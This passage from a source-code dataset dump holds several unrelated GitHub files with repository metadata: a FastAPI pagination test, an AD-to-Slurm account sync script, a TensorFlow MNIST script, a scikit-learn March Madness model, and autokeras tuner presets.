database_url = database_url.replace("sqlite", "sqlite+aiosqlite", 1)
return database_url
@fixture(scope="session")
def engine(database_url):
return create_async_engine(database_url)
@fixture(scope="session")
def Session(engine):
return sessionmaker(engine, class_=AsyncSession)
@fixture(scope="session")
def Base(engine):
return declarative_base()
@fixture(scope="session")
def User(Base):
class User(Base):
__tablename__ = "users"
id = Column(Integer, primary_key=True, autoincrement=True)
name = Column(String, nullable=False)
return User
@fixture(scope="session")
def app(Base, User, Session, engine):
app = FastAPI()
@app.on_event("startup")
async def on_startup():
async with engine.begin() as conn:
await conn.run_sync(Base.metadata.drop_all)
await conn.run_sync(Base.metadata.create_all)
async with Session() as session:
session.add_all([User(name=faker.name()) for _ in range(100)])
await session.commit()
async def get_db() -> AsyncIterator[Session]:
async with Session() as session:
yield session
@app.get("/default", response_model=Page[UserOut])
@app.get("/limit-offset", response_model=LimitOffsetPage[UserOut])
async def route(db: Session = Depends(get_db)):
return await paginate(db, select(User))
add_pagination(app)
return app
@mark.future_sqlalchemy
class TestAsyncSQLAlchemy(BasePaginationTestCase):
@fixture(scope="session")
def client(self, app):
with SafeTestClient(app) as c:
yield c
@fixture(scope="session")
async def entities(self, Session, User):
async with Session() as session:
result = await session.execute(select(User))
return [*result.scalars()]
| UTF-8 | Python | false | false | 2,572 | py | 13 | test_async_sqlalchemy.py | 9 | 0.695568 | 0.693624 | 0 | 90 | 27.577778 | 78 |
UoM-ResPlat-DevOps/melbourne-tools | 15,255,723,860,635 | aac56de4a44c43937c52d259091b6368746697ba | 9bcc6143ef883c697ccc7a0ceb675ed2db8355ad | /spartan/sync_ad.py | 9f02d214093a330ddd92331f1e1bb0b0419fcc09 | []
| no_license | https://github.com/UoM-ResPlat-DevOps/melbourne-tools | f3ffa848bc2810462911963af279c4d09331758f | 1a955dc5cb6990a564bab8155cf64c2271e69fff | refs/heads/master | 2017-10-12T02:53:38.937272 | 2017-09-27T01:17:50 | 2017-09-27T01:20:06 | 35,392,912 | 0 | 1 | null | null | null | null | null | null | null | null | null | null | null | null | null | #!/usr/bin/python
# This script syncs users from AD to Slurm
# It looks up the provided AD accounts and add/deletes users from slurm
# accordingly
import argparse
import subprocess
import os, pdb, sys, traceback
NOOP = False
DEBUG = False
# get list of all slurm accounts
def get_slurm_accounts():
accounts = {}
# sample output
# hpcusers@unimelb.edu.au|
# hpcusers@unimelb.edu.au|user1@unimelb.edu.au
# hpcusers@unimelb.edu.au|user2@unimelb.edu.au
output = subprocess.check_output(['sacctmgr', 'list', 'assoc',
'format=account,user', '--parsable2',
'--noheader'])
try:
for line in output.split('\n'):
account, user = line.split('|')
if user:
accounts.setdefault(account, []).append(user)
except ValueError:
pass
return accounts
# get a list of users/groups from AD
def get_ad_groups(lookup_groups=[]):
groups = {}
for g in lookup_groups:
# sample output
# hpcusers@unimelb.edu.au:*:1234567880:user1@unimelb.edu.au,user2@unimelb.edu.au
try:
output = subprocess.check_output(['getent', 'group', g])
except:
print "ERROR: Can't find AD group %s" % g
continue
output = output.rstrip()
name, passwd, gid, mem = output.split(':')
if len(mem) == 0:
# ad group has users, set it to empty list
groups[g] = []
else:
users = mem.split(',')
for user in users:
groups.setdefault(name, []).append(user)
return groups
# get a list of slurm users from account
def get_slurm_users(account):
accounts = get_slurm_accounts()
return accounts[account]
# delete all slurm users from account
def clear_slurm_accounts(accounts):
for account in accounts:
users = get_slurm_users(account)
del_slurm_users(account, users)
# add users to slurm account
def add_slurm_users(account, users):
for user in users:
args = ['sacctmgr', '--immediate', 'add','user', 'name='+user,
'account='+account]
ret = _call(args)
if ret == 0:
print "Add %s to %s" % (user, account)
else:
print "ERROR! Add %s from %s returns %s" % (user, account, ret)
# delete users from slurm account
def del_slurm_users(account, users):
for user in users:
args =['sacctmgr', '--immediate', 'del', 'user', 'name='+user,
'account='+account]
ret = _call(args)
if ret == 0:
print "Del %s from %s" % (user, account)
else:
print "ERROR! Del %s from %s returns %s" % (user, account, ret)
# create slurm account
def add_slurm_account(account):
print "Creating account %s" % account
args = ['sacctmgr', '--immediate', 'add', 'account', account]
ret = _call(args)
return ret
def add_slurm_account2(account):
try:
print "Creating account %s" % account
args = ['sacctmgr', '--immediate', 'add', 'account', account]
ret = _call(args)
if DEBUG:
print ' '.join(args)
if not NOOP:
FNULL = open(os.devnull, 'w')
subprocess.check_call(args, stdout=FNULL, stderr=subprocess.STDOUT)
return 0
except:
print "Error creating slurm account %s" % account
return 1
# run subprocess.call quietly
# TODO: Make sacctmgr do things quietly so we don't need this
def _call(args):
if DEBUG:
print ' '.join(args)
if not NOOP:
FNULL = open(os.devnull, 'w')
return subprocess.call(args, stdout=FNULL, stderr=subprocess.STDOUT)
else:
return 0
def main(ad_groups=[]):
accounts = get_slurm_accounts()
groups = get_ad_groups(ad_groups)
for ad_group in groups:
ad_users = set(groups[ad_group])
# sometimes an account might not be created in slurm yet
if ad_group not in accounts:
# creates account
ret = add_slurm_account(ad_group)
# if there's an error creating account, skip to next
if ret != 0: continue
# list of users in this account will be blank
slurm_users = set([])
else:
slurm_users = set(accounts[ad_group])
not_in_slurm = ad_users - slurm_users
not_in_ad = slurm_users - ad_users
add_slurm_users(ad_group, not_in_slurm)
del_slurm_users(ad_group, not_in_ad)
if __name__ == "__main__":
parser = argparse.ArgumentParser(description='Sync AD group to slurm')
parser.add_argument('groups', metavar='group', nargs='+', help='AD group name')
parser.add_argument('-c', '--clear',
help='Clear the group in slurm',
action="store_true")
parser.add_argument('-d', '--debug',
help='Run in debug mode. Print slurm commands executed.',
action="store_true")
parser.add_argument('-n', '--noop',
help='Run in noop mode. Do not actually add users',
action="store_true")
args = parser.parse_args()
ad_groups = args.groups
if args.debug: DEBUG = True
if args.noop:
print "Running in NOOP mode"
NOOP = True
try:
if args.clear:
clear_slurm_accounts(ad_groups)
else:
# main method
main(ad_groups)
except:
type, value, tb = sys.exc_info()
traceback.print_exc()
pdb.post_mortem(tb)
| UTF-8 | Python | false | false | 5,642 | py | 48 | sync_ad.py | 44 | 0.564516 | 0.56044 | 0 | 187 | 29.171123 | 88 |
kysshsy/pai | 7,937,099,595,563 | 462be559260c457f6d0f5908f090a67689472c81 | ea05885d182c99c94aa271a865cdf88224afe5b0 | /test3/digi_recognize.py | 45a16695e08039f3f62528ef7a16eb6f241337c4 | []
| no_license | https://github.com/kysshsy/pai | 9471b6f4f521f6efe754a4b52c2bbddb703ead4e | 50a17e39eb3f96183cebdd68923f7e948654458d | refs/heads/master | 2020-06-06T04:53:06.474180 | 2019-07-02T04:51:54 | 2019-07-02T04:51:54 | 192,642,271 | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null | import pandas as pd
import numpy as np
import tensorflow as tf
# pre_process
def transform_one_hot(labels):
n_labels = np.max(labels) + 1
one_hot = np.eye(n_labels)[labels]
return one_hot
train_data = pd.read_csv("train.csv")
img = train_data.values[:,1:]
label = train_data.values[:,0]
train_img = img.astype(np.float64)
train_label = transform_one_hot(label)
test_img = pd.read_csv("test.csv")
test_img = test_img.astype(np.float64)
x = tf.placeholder("float", [None, 784])
y_= tf.placeholder("float", [None, 10])
W = tf.Variable(tf.zeros([784,10]))
b = tf.Variable(tf.zeros([10]))
y = tf.nn.softmax(tf.matmul(x,W) + b)
cross_entropy = -tf.reduce_sum(y_*tf.log(tf.clip_by_value(y,1e-10,1.0)))
train_step = tf.train.GradientDescentOptimizer(0.0000001).minimize(cross_entropy)
# 参数无法更新/ 向错误的方向更新 目测是数据预处理出现了问题
correct_prediction = tf.equal(tf.argmax(y, 1), tf.argmax(y_, 1))
accuracy = tf.reduce_mean(tf.cast(correct_prediction, "float"))
init = tf.initialize_all_variables()
with tf.Session() as sess:
sess.run(init)
for i in range(1000):
batch_size = 100
index = np.random.choice(a=42000, size=batch_size)
sess.run(train_step, feed_dict={x: train_img[index], y_: train_label[index]})
print(sess.run(accuracy, feed_dict={x: train_img, y_: train_label}))
result = sess.run(y, feed_dict={x: test_img})
print(result)
lenth = len(result)
print(lenth)
answer = [[i+1,np.argmax(result[i])] for i in range(lenth)]
dataframe = pd.DataFrame({'ImageId':[answer[i][0] for i in range(lenth)],'Label':[answer[i][1] for i in range(lenth)]})
dataframe.to_csv("submit.csv",index = False) | UTF-8 | Python | false | false | 1,707 | py | 6 | digi_recognize.py | 5 | 0.670901 | 0.641258 | 0 | 51 | 31.431373 | 123 |
kalyons11/march-madness | 16,690,242,933,358 | 8697a0038546783d877b80aeea971c82b0ec6080 | 64ab9e962325285406477f9fd2ca22ad427c8054 | /classes/model.py | 896393668b833856f797a598316dd08018f09c10 | [
"MIT"
]
| permissive | https://github.com/kalyons11/march-madness | 5d97e09f4eb7f70fb9ad12d9cd68d15f80cfbfb8 | 3171813785fb5915aa5240d4c507210e816d22f4 | refs/heads/master | 2020-03-10T09:49:26.794378 | 2018-05-11T03:44:49 | 2018-05-11T03:44:49 | 129,319,462 | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null | import numpy as np
import matplotlib.pyplot as plt
from sklearn.ensemble import RandomForestClassifier
from sklearn.linear_model import LogisticRegression
from sklearn.metrics import classification_report, roc_curve, auc
from sklearn.model_selection import train_test_split
from .feature import Feature
from .feature_vector import FeatureVector
from .game_context import GameContext
class Model:
"""Represents one of our models."""
def __init__(self, name, features, model_type='LogisticRegression',
mode='sub'):
"""
name: name of this model, for debugging purposes
features: list[Feature] for this model
model_type: .
"""
self.name = name
self.features = features
self.model_type = model_type
self._sklearn_model = None
self.mode = mode
@property
def sklearn_model(self):
if self._sklearn_model is not None:
return self._sklearn_model
elif self.model_type == "LogisticRegression":
self._sklearn_model = LogisticRegression()
elif self.model_type == "RandomForestClassifier":
self._sklearn_model = RandomForestClassifier()
return self._sklearn_model
@classmethod
def default(cls):
return cls('default_linear',
[Feature('ppg', lambda df: df['score'].mean())])
def get_vector(self, season, team, other, dm):
"""
season: Season object
team: Team object
dm: DataManager
returns: FeatureVector filtered on season and team, aggregated
accordingly
"""
# compute each feature and append to result dict
result = {}
for f in self.features:
result[f] = f.compute(dm, team, GameContext(team, other, season))
return FeatureVector(result)
def get_X_y(self, trainer):
X, y = [], []
# X is list of FeatureVector
# y is 1/0 values
data_raw = trainer.dm.get_training_data()
for result in data_raw:
vect_a = self.get_vector(result.season, result.winner,
result.loser, trainer.dm)
vect_b = self.get_vector(result.season, result.loser,
result.winner, trainer.dm)
vect_combo_a = self.combine_vectors(vect_a, vect_b)
X.append(vect_combo_a.to_list())
y.append(1)
vect_combo_b = self.combine_vectors(vect_b, vect_a)
X.append(vect_combo_b.to_list())
y.append(0)
return np.array(X), np.array(y)
def train(self, trainer):
# Need to do the following:
# 1. Parse data
X, y = self.get_X_y(trainer)
# 2. Split data
X_train, X_test, y_train, y_test = train_test_split(
X, y, test_size=0.2, random_state=42)
#import pdb; pdb.set_trace()
# 3. Fit on training
self.sklearn_model.fit(X_train, y_train)
# 3. Evaluate on testing
y_pred = self.sklearn_model.predict(X_test)
# 3A. ROC/AUC
self.generate_roc_auc_curve(y_test, y_pred)
# 4. Return evaluation result
return classification_report(y_test, y_pred)
# score = self.sklearn_model.score(X_test, y_test)
def predict(self, a, b, runner):
"""
a: Team a
b: Team b
runner: runner calling me
returns: 0/1 - 1 if a wins, 0 else
"""
vect_a = self.get_vector(runner.season, a, b, runner.dm)
vect_b = self.get_vector(runner.season, b, a, runner.dm)
vect_combo = self.combine_vectors(vect_a, vect_b)
X = [vect_combo.to_list()]
result = self._sklearn_model.predict(X)
return result[0]
def combine_vectors(self, a, b):
"""
a, b: FeatureVector's
returns: combination of a and b
"""
if self.mode == 'sub':
return a - b
elif self.mode == 'concat':
return a.concat(b)
def generate_roc_auc_curve(self, y_true, y_pred):
lw = 2
fpr, tpr, _ = roc_curve(y_true, y_pred)
roc_auc = auc(fpr, tpr)
plt.plot(fpr, tpr, color='darkorange',
lw=lw, label='ROC curve (area = %0.2f)' % roc_auc)
plt.plot([0, 1], [0, 1], color='navy', lw=lw, linestyle='--')
plt.xlim([0.0, 1.0])
plt.ylim([0.0, 1.05])
plt.xlabel('False Positive Rate')
plt.ylabel('True Positive Rate')
plt.title(f'Receiver operating characteristic of model {self.name}')
plt.legend(loc="lower right")
plt.show()
| UTF-8 | Python | false | false | 4,647 | py | 26 | model.py | 18 | 0.570906 | 0.563374 | 0 | 133 | 33.93985 | 77 |
TAIPANBOX/autokeras | 901,943,171,482 | 42ae8cabf2399a0eac06aaac5cda99e40daeddc3 | 2d8b7a06a510776d3f83b3c39ea62128c6b49f19 | /autokeras/tuners/task_specific.py | c015ca9aa7c9354b5628821aa5ee729e6ea25e7d | [
"MIT"
]
| permissive | https://github.com/TAIPANBOX/autokeras | ac3dbad01aa9d07140bcfc2280160e426f0606ce | fba4c190a846e84a6dcf460d1dc2aad0c739705c | refs/heads/master | 2022-07-11T02:46:14.001874 | 2020-05-17T22:10:09 | 2020-05-17T22:10:47 | 265,168,850 | 3 | 0 | MIT | true | 2020-05-19T06:52:39 | 2020-05-19T06:52:38 | 2020-05-19T06:52:36 | 2020-05-19T05:12:08 | 40,303 | 0 | 0 | 0 | null | false | false | from autokeras.tuners import greedy
IMAGE_CLASSIFIER = [{
'image_block_1/block_type': 'vanilla',
'image_block_1/normalize': True,
'image_block_1/augment': False,
'image_block_1/conv_block_1/kernel_size': 3,
'image_block_1/conv_block_1/num_blocks': 1,
'image_block_1/conv_block_1/num_layers': 2,
'image_block_1/conv_block_1/max_pooling': True,
'image_block_1/conv_block_1/separable': False,
'image_block_1/conv_block_1/dropout_rate': 0.25,
'image_block_1/conv_block_1/filters_0_0': 32,
'image_block_1/conv_block_1/filters_0_1': 64,
'classification_head_1/spatial_reduction_1/reduction_type': 'flatten',
'classification_head_1/dropout_rate': 0.5,
'optimizer': 'adam'
}, {
'image_block_1/block_type': 'resnet',
'image_block_1/normalize': True,
'image_block_1/augment': True,
'image_block_1/image_augmentation_1/horizontal_flip': True,
'image_block_1/image_augmentation_1/vertical_flip': True,
'image_block_1/res_net_block_1/version': 'v2',
'image_block_1/res_net_block_1/pooling': 'avg',
'image_block_1/res_net_block_1/conv3_depth': 4,
'image_block_1/res_net_block_1/conv4_depth': 6,
'classification_head_1/dropout_rate': 0,
'optimizer': 'adam'
}]
TEXT_CLASSIFIER = [{
'text_block_1/vectorizer': 'sequence',
'classification_head_1/dropout_rate': 0,
'optimizer': 'adam',
'text_block_1/max_tokens': 5000,
'text_block_1/conv_block_1/separable': False,
'text_block_1/text_to_int_sequence_1/output_sequence_length': 512,
'text_block_1/embedding_1/pretraining': 'none',
'text_block_1/embedding_1/embedding_dim': 64,
'text_block_1/embedding_1/dropout_rate': 0.25,
'text_block_1/conv_block_1/kernel_size': 5,
'text_block_1/conv_block_1/num_blocks': 1,
'text_block_1/conv_block_1/num_layers': 1,
'text_block_1/conv_block_1/max_pooling': False,
'text_block_1/conv_block_1/dropout_rate': 0,
'text_block_1/conv_block_1/filters_0_0': 256,
'text_block_1/spatial_reduction_1/reduction_type': 'global_max',
'text_block_1/dense_block_1/num_layers': 1,
'text_block_1/dense_block_1/use_batchnorm': False,
'text_block_1/dense_block_1/dropout_rate': 0.5,
'text_block_1/dense_block_1/units_0': 256,
}]
class ImageClassifierTuner(greedy.Greedy):
def __init__(self, **kwargs):
super().__init__(
initial_hps=IMAGE_CLASSIFIER,
**kwargs)
class TextClassifierTuner(greedy.Greedy):
def __init__(self, **kwargs):
super().__init__(
initial_hps=TEXT_CLASSIFIER,
**kwargs)
| UTF-8 | Python | false | false | 2,595 | py | 80 | task_specific.py | 56 | 0.647399 | 0.599615 | 0 | 67 | 37.731343 | 74 |
s4swadhin/TalkPythonToMe | 2,946,347,613,261 | 4a0d1b51727184fff4d30773b609ca9782a77fa3 | 973c3a34e0bb25fabdf10edfb3211c4160ff319e | /Birthday_Countdown/program.py | 4a79af4a67d53424c43f4dbb2672f4e57a5bdeef | []
| no_license | https://github.com/s4swadhin/TalkPythonToMe | 2218c4cd1deaf0341bc5632adbe8176709330207 | 86a08b59dfe00787eee66f3b2260c301f4ac8af3 | refs/heads/master | 2019-08-22T22:00:36.801193 | 2016-06-10T14:12:29 | 2016-06-10T14:12:29 | null | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null | import datetime
def print_header():
print('-------------------------------------')
print(' Birhtday Counter')
print('-------------------------------------')
def get_birthday_from_user():
print('Tell us when you are born: ')
year = int(input('Year [YYYY]: '))
month = int(input('Month [MM]: '))
day = int(input('Day [DD]: '))
birthday = datetime.datetime(year, month, day)
print('Entered date for bith is {0}'.format(birthday))
return birthday
def compute_days_between_dates(original_date, now):
dt = now - datetime.datetime(now.year,
original_date.month, original_date.day)
days = int(dt.total_seconds() / 60 / 60 / 24)
return days
def print_birthday_information(days):
if days < 0:
print('Your birthday is in {0} days'.format(-days))
elif days > 0:
print('You already had your birthday this year, It was {0} days ago.'.format(days))
else:
print('Happy Birthday !!!')
def main():
print_header()
bday = get_birthday_from_user()
now = datetime.datetime.now()
no_of_days = compute_days_between_dates(bday, now)
print_birthday_information(no_of_days)
main() | UTF-8 | Python | false | false | 1,213 | py | 9 | program.py | 6 | 0.570486 | 0.561418 | 0 | 43 | 27.232558 | 91 |
maroodb/allsafe-ctf | 2,937,757,642,448 | ee98abe0eb01ca7dd991541aa1a057a27fc9bbd3 | 4c044acdce8d83cc240e8b6221ec394c70d5400a | /ctf/urls.py | 774ba37b06b6561ce3e36fadc08bdbca9b4dc5ce | []
| no_license | https://github.com/maroodb/allsafe-ctf | 4d94b0e6772c51bbf0ff662d01474e970563f3a1 | 3893bb64203b7c28285467d1b7ff0ad149b204d9 | refs/heads/master | 2021-07-14T11:04:16.225012 | 2019-09-13T08:26:18 | 2019-09-13T08:26:18 | 150,078,611 | 1 | 0 | null | false | 2020-06-05T23:23:30 | 2018-09-24T09:14:48 | 2019-09-13T08:27:14 | 2020-06-05T23:23:28 | 118,330 | 0 | 0 | 2 | JavaScript | false | false | from django.conf.urls import url
from ctf.views import scoreboard, upload, challenges, ctf_resolve, challenge_details
urlpatterns = [
url(r'^scoreboard/', scoreboard),
url(r'^upload/', upload),
url(r'^challenges/$', challenges),
url(r'^challenges/(?P<id_ch>\d+)$', challenge_details, name='challenge_details'),
url(r'^submit/(?P<id_ch>\d+)$', ctf_resolve, name='resolve_challenge'),
]
| UTF-8 | Python | false | false | 411 | py | 73 | urls.py | 54 | 0.666667 | 0.666667 | 0 | 15 | 26.4 | 85 |
Ziva1811/BikeShare | 15,891,379,036,118 | b129365178159c4e7b21afe875ba4f11a2ba0992 | f134ed5baab5f7c792562722900f49752ea68b6f | /bikeshare.py | c707036d787480696c0fc308f25d53f4df18ad64 | []
| no_license | https://github.com/Ziva1811/BikeShare | 8fc6a9b7a9ffa839c2a8f66b6e1c6059dea5f7e2 | d153c3fba45a03e9962091808edc280ebf8985ee | refs/heads/master | 2020-04-02T17:34:06.824901 | 2018-10-28T07:33:40 | 2018-10-28T07:33:40 | 154,662,564 | 1 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null | import time
import pandas as pd
import numpy as np
CITY_DATA = { 'chicago': 'chicago.csv',
              'new york city': 'new_york_city.csv',
              'washington': 'washington.csv' }

MONTHS = ['january', 'february', 'march', 'april', 'may', 'june']
def get_filters():
"""
Asks user to specify a city, month, and day to analyze.
Returns:
(str) city - name of the city to analyze
(str) month - name of the month to filter by, or "all" to apply no month filter
(str) day - name of the day of week to filter by, or "all" to apply no day filter
"""
    city = ' '
    while city not in CITY_DATA:
        city = input('\nHello! Let\'s explore some US bikeshare data!\n'
                     'Would you like to see data for Chicago, New York City, or'
                     ' Washington?\n').lower()
        if city not in CITY_DATA:
            print("Please enter the name of a city: Chicago, New York City or Washington")
    month = ' '
    while month not in ['all', 'january', 'february', 'march', 'april', 'may', 'june']:
        month = input("Enter any month from January to June, or 'all': ").lower()
    day = ' '
    while day not in ['all', 'sunday', 'monday', 'tuesday', 'wednesday', 'thursday', 'friday', 'saturday']:
        day = input("Enter any day of the week, or 'all': ").lower()
print('-'*40)
return city, month, day
def load_data(city, month, day):
"""
Loads data for the specified city and filters by month and day if applicable.
Args:
(str) city - name of the city to analyze
(str) month - name of the month to filter by, or "all" to apply no month filter
(str) day - name of the day of week to filter by, or "all" to apply no day filter
Returns:
df - Pandas DataFrame containing city data filtered by month and day
"""
    df = pd.read_csv(CITY_DATA[city])
    df['Start Time'] = pd.to_datetime(df['Start Time'])
    df['month'] = df['Start Time'].dt.month
    df['Week_Day'] = df['Start Time'].dt.day_name()
    df['Hour'] = df['Start Time'].dt.hour
    if month != 'all':
        month = MONTHS.index(month) + 1
        df = df[df['month'] == month]
    if day != 'all':
        df = df[df['Week_Day'] == day.title()]
    return df
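# Example (illustrative): load_data('chicago', 'march', 'friday') returns only
# the Chicago trips that started on a Friday in March.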
def time_stats(df):
"""Displays statistics on the most frequent times of travel."""
print('\nCalculating The Most Frequent Times of Travel...\n')
start_time = time.time()
    most_common_month = df['month'].value_counts().idxmax()
    print('\nThe most common month is:', most_common_month)
    most_common_week_day = df['Week_Day'].value_counts().idxmax()
    print('\nThe most common day of week is:', most_common_week_day)
    most_common_hour = df['Hour'].value_counts().idxmax()
    print('\nThe most common start hour is:', most_common_hour)
print("\nThis took %s seconds." % (time.time() - start_time))
print('-'*40)
def station_stats(df):
"""Displays statistics on the most popular stations and trip."""
print('\nCalculating The Most Popular Stations and Trip...\n')
start_time = time.time()
most_common_start_station = df['Start Station'].value_counts().idxmax()
print("The most commonly used start station :", most_common_start_station)
most_common_end_station = df['End Station'].value_counts().idxmax()
print("The most commonly used end station :", most_common_end_station)
most_common_start_end_station = df[['Start Station', 'End Station']].mode().loc[0]
print("The most commonly used start station and end station : {}, {}"\
.format(most_common_start_end_station[0], most_common_start_end_station[1]))
print("\nThis took %s seconds." % (time.time() - start_time))
print('-'*40)
def trip_duration_stats(df):
"""Displays statistics on the total and average trip duration."""
print('\nCalculating Trip Duration...\n')
start_time = time.time()
    total_travel = int(df['Trip Duration'].sum())
    d = total_travel // (3600 * 24)
    h = (total_travel % (3600 * 24)) // 3600
    m = (total_travel % 3600) // 60
    print("Total travel time: " + str(d) + " day(s) " + str(h) + " hour(s) " + str(m) + " minute(s).")
    mean_travel = int(df['Trip Duration'].mean())
    md = mean_travel // (3600 * 24)
    mh = (mean_travel % (3600 * 24)) // 3600
    mm = (mean_travel % 3600) // 60
    print("Mean travel time: " + str(md) + " day(s) " + str(mh) + " hour(s) " + str(mm) + " minute(s).")
print("\nThis took %s seconds." % (time.time() - start_time))
print('-'*40)
def user_stats(df):
"""Displays statistics on bikeshare users."""
print('\nCalculating User Stats...\n')
start_time = time.time()
    user_counts = df['User Type'].value_counts()
    for index, user_count in enumerate(user_counts):
        print(" {}: {}".format(user_counts.index[index], user_count))
    print("Travel time for each user type:\n")
    group_by_user_trip = df.groupby(['User Type']).sum()['Trip Duration']
    for index, user_trip in enumerate(group_by_user_trip):
        print(" {}: {}".format(group_by_user_trip.index[index], user_trip))
    if 'Gender' in df.columns:
        gender_counts = df['Gender'].value_counts()
        male_count = gender_counts.get('Male', 0)
        female_count = gender_counts.get('Female', 0)
        print('There are {} male users and {} female users.'.format(male_count, female_count))
if 'Birth Year' in df.columns:
birth_year = df['Birth Year']
most_common_year = birth_year.value_counts().idxmax()
print("The most common birth year:", most_common_year)
most_recent = birth_year.max()
print("The most recent birth year:", most_recent)
earliest_year = birth_year.min()
print("The most earliest birth year:", earliest_year)
print("\nThis took %s seconds." % (time.time() - start_time))
print('-'*40)
def display(df):
    n = 0
    d = input("Would you like to view 5 rows of data? ").lower()
    while True:
        if d == 'yes' or d == 'y':
            n = n + 5
            print(df.head(n))
        elif d == 'no' or d == 'n':
            break
        else:
            print("Please enter a valid input, either yes/y or no/n:")
        d = input("Would you like to view 5 more rows of data? ").lower()
    return
def main():
city, month, day = get_filters()
df = load_data(city, month, day)
time_stats(df)
station_stats(df)
trip_duration_stats(df)
user_stats(df)
    # display five rows of data at a time if the user likes
display(df)
restart = input('\nWould you like to restart? Enter yes or no.\n')
while restart.lower() not in ['yes', 'no']:
print("Invalid input. Please type 'yes' or 'no'.")
restart = input('\nWould you like to restart? Type \'yes\' or \'no\'.\n')
if restart.lower() == 'yes':
main()
if __name__ == "__main__":
main()
| UTF-8 | Python | false | false | 6,955 | py | 2 | bikeshare.py | 1 | 0.583178 | 0.577139 | 0 | 235 | 28.595745 | 102 |
vcp-kurhessen/Pfadiralala-IV | 19,378,892,448,212 | e21a5240f43826b95a84d89e3088ab553ada3579 | 1e5798fe2191f198f8a312a602601aa58c70d9c2 | /Tools/txt2Latex/config/metakeys.py | 79ec524942f40c61f43c743a1c5b0002865b8bba | [
"MIT"
]
| permissive | https://github.com/vcp-kurhessen/Pfadiralala-IV | 597add15b5bf43460fd97f790918f70f6b7768e8 | 66ae5de12c59bfa1da83edcc2c5cc6ecd962ceb5 | refs/heads/master | 2023-07-10T01:36:09.811290 | 2023-06-24T14:58:38 | 2023-06-24T14:58:38 | 50,174,511 | 29 | 14 | null | false | 2022-10-12T11:46:49 | 2016-01-22T10:27:48 | 2022-08-23T10:34:19 | 2022-10-12T11:46:49 | 383,847 | 23 | 13 | 6 | TeX | false | false | # Schlüssel für metaangaben, die im Titelblock eines Liedes Vorkommen dürfen. siehe auch die Definition in lib/Heuristik/Heuristik.py
metakeys = dict( # Siehe auch liste in Heuristik.py
ww='wuw', # Worte und weise
wuw='wuw',
jahr='jahr', # jahr des Liedes
j='jahr',
mel='mel', # Autor der Melodie
melodie='mel',
weise='mel',
melj='meljahr', # Jahr der Melodie
meljahr='meljahr',
weisej='meljahr',
weisejahr='meljahr',
txt='txt', # Autor des Textes
text='txt',
worte='txt',
txtj='txtjahr', # Jahr des Textes
textj='txtjahr',
txtjahr='txtjahr',
textjahr='txtjahr',
wortejahr='txtjahr',
wortej='txtjahr',
alb='alb', # Album, auf dem das Lied erschienen ist.
album='alb',
lager='lager', # Lager, auf dem / für das das Lied geschrieben
tonart='tonart', # originaltonart
capo='capo', # vorschlag für das setzen des Capos
cap='capo', # TODO: in Latex setzen
key='tonart',
bo='bo', # Seite im Bock
bock='bo',
cp='cp', # Seite iom Codex Pathomomosis
codex='cp',
pf1='pfi', # Seite im Pfadiralala1
pfi='pfi',
pf='pfi',
pf2='pfii', # Seite im Pfadiralala2
pfii='pfii',
pf3='pfiii', # Seite im Pfadiralala3
pfiii='pfiii',
pf4='pfiv',
pfiiii='pfiv',
pfiv='pfiv',
pf4p='pfivp',
pfiiiip='pfivp',
pfivp='pfivp',
ju='ju', # Seite in der Jurtenburg
jurten='ju',
jurtenburg='ju',
gruen='gruen', # Seite Im Grünen (Liederbuch)
grün='gruen',
gruenes='gruen',
grünes='gruen',
kss4='kssiv', # Seite in Kinder-Schoko-Songs 4
kssiv='kssiv',
kssiiii='kssiv',
siru='siru', # Seite in Die singende Runde
biest='biest', # Seite im Biest
eg='eg', # Seite im evangelischen Gesangbuch
evg='eg',
egp='egplus', # Seite Im evangelischen Gesangbuch plus
evgp='egplus',
egplus='egplus',
evgplus='egplus',
tf='tf',
turm='tf',
turmfalke='tf',
gb='gb',
gnorken='gb',
gnorkenbüdel='gb')
| UTF-8 | Python | false | false | 2,059 | py | 584 | metakeys.py | 18 | 0.597561 | 0.592683 | 0 | 71 | 27.873239 | 133 |
Vishal-kilaskar/job_assignments | 5,196,910,478,842 | f543518dd1febeb51a2452268971dfec7b74339e | f9d60e93286244ebb16f56f35ee089ddb8bd85d6 | /korangle/movie_data/urls.py | fb511ee6aeed205422606139f2b802e621c59e2f | []
| no_license | https://github.com/Vishal-kilaskar/job_assignments | 90c26313e86d83408909ac0a11da12be9d163e64 | 8c579eb9ac4a915e37db735f47fd15c1ad6bbf5c | refs/heads/master | 2023-02-13T12:37:47.603795 | 2021-01-07T13:13:29 | 2021-01-07T13:13:29 | 318,994,444 | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null | from django.urls import path
from . import views
urlpatterns = [
path('', views.home),
path('api/get_data/', views.get_data),
path('api/post_data/', views.post_data)
] | UTF-8 | Python | false | false | 179 | py | 22 | urls.py | 14 | 0.653631 | 0.653631 | 0 | 7 | 24.714286 | 43 |
zt1112/pytorch_inceptionv3 | 13,194,139,579,284 | b647eb3b7eca046154fd6c5c7ae0c74b8f84d378 | 8025816040aeb1d845e17e6a4d780ae2a8668ef3 | /data/gentxt | 7754bc1f182e8867f7cdfc00beaa30974f48f461 | []
| no_license | https://github.com/zt1112/pytorch_inceptionv3 | 24714ee84bcc4775b8c74429c06fb38a7e653eb6 | bd3a7afe1cb6e9db8ef3a2f48ecf34666bdfaddf | refs/heads/master | 2020-03-20T13:26:32.403181 | 2018-01-19T06:12:15 | 2018-01-19T06:12:15 | 137,455,812 | 4 | 0 | null | true | 2018-06-15T07:31:55 | 2018-06-15T07:31:55 | 2018-06-07T03:23:43 | 2018-01-19T06:12:16 | 10 | 0 | 0 | 0 | null | false | null | #!/usr/bin/python
#-*-coding:utf8-*-
import os
with open('label2.txt','r') as f:
text = f.read()
dic = text.split(',')
files = os.listdir('./val/')
print(len(files))
f = open('val_label.txt','w')
for file in files:
a = file.split('_')[0]
f.write(file+' '+a+'\n')
f.close()
| UTF-8 | Python | false | false | 286 | 6 | gentxt | 4 | 0.566434 | 0.555944 | 0 | 17 | 15.588235 | 33 |
DianYu420376/Full-Backprop-Test-on-20-News-1 | 17,171,279,254,241 | 5fdbc55644b9feb9d771ed62ee8fe78e18dd9712 | 000ca12a989d7bd96426a421099d5f036dda6130 | /Test_20NewsGroup/check_gradient.py | 3f1f71b12e7daa535d838850e1612525c6ce2665 | []
